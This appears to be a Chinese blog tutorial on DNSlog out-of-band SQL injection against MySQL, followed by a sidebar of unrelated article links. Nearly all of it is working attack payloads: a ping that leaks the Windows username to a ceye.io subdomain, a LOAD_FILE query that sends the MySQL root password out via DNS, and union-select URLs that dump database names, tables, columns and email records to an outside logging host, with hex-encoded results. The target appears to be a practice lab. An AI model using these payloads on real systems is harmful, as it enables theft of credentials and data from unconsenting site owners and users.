当前位置:网站首页>DNSlog外带数据注入
DNSlog外带数据注入
2022-08-05 06:06:00 【树迷了路】
DNSlog
DNS log即DNS日志,域名解析的记录
外带原理
测试平台利用泛解析机制解析域名,并在解析我们构造的子域名时记录,生成日志,只要有解析就数据,我们查看日志即可获取关键数据
MySQL条件
配置文件 mysql.ini 中 secure_file_priv 参数需为空
mysql> show variables like '%secu%';
+------------------+-------+
| Variable_name | Value |
+------------------+-------+
| secure_auth | OFF |
| secure_file_priv | |
+------------------+-------+
2 rows in set (0.00 sec)CEYE
测试网站
windows
ping %USERNAME%.b182oj.ceye.iob1820j 换成网站分配的
SQL Injection
MySQL
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));load_file 是MySQL读文件的 函数 ;
\\\\——>\\
编码绕过
有些特殊字符在网站中是不合规代码,如user() 中的 @ ;
转十六进制即可;
如下实际为构造域名:\\user().aueuhs.ceye.io\\abc
?id=-1' union select 1,load_file(concat('\\\\',hex(user()),'.aueuhs.ceye.io\\abc')),3--+


| 726F6F74406C6F63616C686F7374 |

查数据库
?id=-1' union select 1,load_file(concat('\\\\',database(),'.aueuhs.ceye.io\\abc')),3--+

CEYE以将数据带入;

查表
?id=-1' union select 1,load_file(concat('\\\\',hex((select group_concat(table_name) from information_schema.tables where table_schema="security")),'.aueuhs.ceye.io\\abc')),3--+

| 656D61696C732C72656665726572732C756167656E74732C7573657273 |
查字段名
?id=-1' union select 1,load_file(concat('\\\\',hex((select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="emails")),'.aueuhs.ceye.io\\abc')),3--+


| 69642C656D61696C5F6964 |
查数据
?id=-1' union select 1,load_file(concat('\\\\',hex((select concat(id,0x3e,email_id) from security.emails limit 0,1)),'.aueuhs.ceye.io\\abc')),3--+

| 313E44756D62406468616B6B616E2E636F6D |


边栏推荐
猜你喜欢

文件内音频的时长统计并生成csv文件

NACOS Configuration Center Settings Profile

浮点数基础知识

Japan Sanitary Equipment Industry Association: Japan's warm water shower toilet seat shipments reached 100 million sets

【5】Docker中部署MySQL

uniapp打包次数限制怎么办?只需两步就能解决

Collision, character controller, Cloth components (cloth), joints in the Unity physics engine

【FAQ】CCAPI兼容EOS相机列表(2022年8月 更新)

《PyTorch深度学习实践》第十一课(卷积神经网络CNN高级版)

更改小程序原生radio的颜色及大小
随机推荐
【5】Docker中部署MySQL
LaTeX uses frame to make PPT pictures without labels
关于Antd的Affix突然不好用了,或者Window的scroll监听不好用了
基于快速行进平方法的水面无人船路径规划
Redis
MySQL表操作练习
多用户商城多商户B2B2C拼团砍价秒杀支持小程序H5+APP全开源
利用将网页项目部署到阿里云上(ngnix)
document.querySelector()方法
The NDK compiler so libraries
技术分析模式(十一)如何交易头肩形态
MyCat配置文件
In-depth analysis if according to data authority @datascope (annotation + AOP + dynamic sql splicing) [step by step, with analysis process]
typescript68-索引查询类型(查询多个)
开启防火墙iptable规则后,系统网络变慢
Collision, character controller, Cloth components (cloth), joints in the Unity physics engine
技术分析模式(七)发挥差距
农场游戏果园系统+牧场养殖系统+广告联盟模式流量主游戏小程序APP V1
txt文件英语单词词频统计
深入分析若依数据权限@datascope (注解+AOP+动态sql拼接) 【循序渐进,附分析过程】